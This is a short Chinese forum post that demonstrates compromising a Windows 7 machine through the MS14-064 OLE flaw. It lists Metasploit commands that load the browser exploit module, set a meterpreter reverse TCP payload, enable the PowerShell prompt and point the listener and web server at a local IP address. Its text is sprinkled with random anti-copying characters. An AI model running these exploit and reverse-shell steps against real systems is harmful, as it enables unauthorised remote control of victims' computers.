找回密码
 立即注册
查看: 2627|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% u+ s+ F2 ^. o3 F+ p% n2 R- c) } 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示9 n" X" C! ]9 j; V- b1 ~, U6 T h

6 A) |2 G$ \" ^3 W. z, @! Q/ E

$ G3 |' D, y+ G 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ' c8 [; ]7 C, v, \% v( J7 [* S

- n! @# b$ i8 Q @0 D; p

: H2 h3 ~. \3 ]7 Z- ^) V 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp$ B, s7 x% z+ F# A

) k. ` x, |, n% Z

; r1 T+ P4 c2 ~! l, p             set AllowPowershellPrompt true $ G4 V- F3 P) e9 { l

+ O2 Y9 [' S8 I, g; M3 j

0 F4 `2 U; D! C2 ]             Set LHOST 192.168.0.109; {* v; W ]* A" x/ {' v. [

$ m7 u! f4 P! l5 }; q

5 K0 w3 D# n# U; v1 {             set SRVHOST 192.168.0.1090 F( `" e) z/ i- Y

( J! g9 t& r3 w i9 I

7 o' C7 ~2 R' k8 Q             Set uripath share+ L7 w0 P3 X. b8 D$ K6 t& Q

: j* I( V- R0 S2 f# {4 Z

( i$ t" H" y6 ]6 N             Set srvport 80! y5 G- Q5 b! `$ T0 z: k

8 S8 `- `& N, |. O& D

7 t; u0 T6 d0 ~9 [. ?7 I3 @   4 B t$ e/ A/ V: r0 L

b$ d+ |9 D! I9 d* k( @; B

! Q* E! K o, g J9 B   : m6 Z8 n8 i1 b% j" |1 p

9 y$ s9 r7 ^+ F, k9 D

- t: B/ w, R6 [( u Q   9 F3 P7 R$ j! Q; n8 ~# E3 G$ ~

8 T) k8 w; z0 l: j' O. k# {

d; t6 I7 `0 j3 Y$ v/ d  3 X# S/ Q+ N6 H m5 k

. ?0 ~2 m3 U0 z

5 e( O+ c1 Z5 M  . _5 `# e: y0 q- U& B

f0 _4 _8 d) Q( O* [

9 L; ?; Y7 N2 Z- N" p4 J3 W2 \ 下面我们来访问本地地址如图:! u7 v; V3 f: k& G3 l' u' N, v; \

3 l5 Q w& d' G4 N+ A6 w

: n' N/ r% X/ h- i   ) h$ { q7 q' T# E+ u5 x0 Q

/ `. R, L+ ?! A' M# h

9 p, j2 j2 _. ^' e. f C# E   * C" I1 \! s: v8 R- V4 v

$ A4 s! T2 F; p

+ y0 v0 A* |- X" V2 o8 C " ^1 k# s% f* G' T5 _8 y5 u! x# U

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表